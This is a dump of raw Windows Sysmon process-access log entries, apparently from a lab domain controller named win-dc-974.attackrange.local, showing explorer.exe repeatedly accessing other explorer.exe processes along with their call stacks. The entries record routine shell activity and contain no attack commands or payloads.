16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 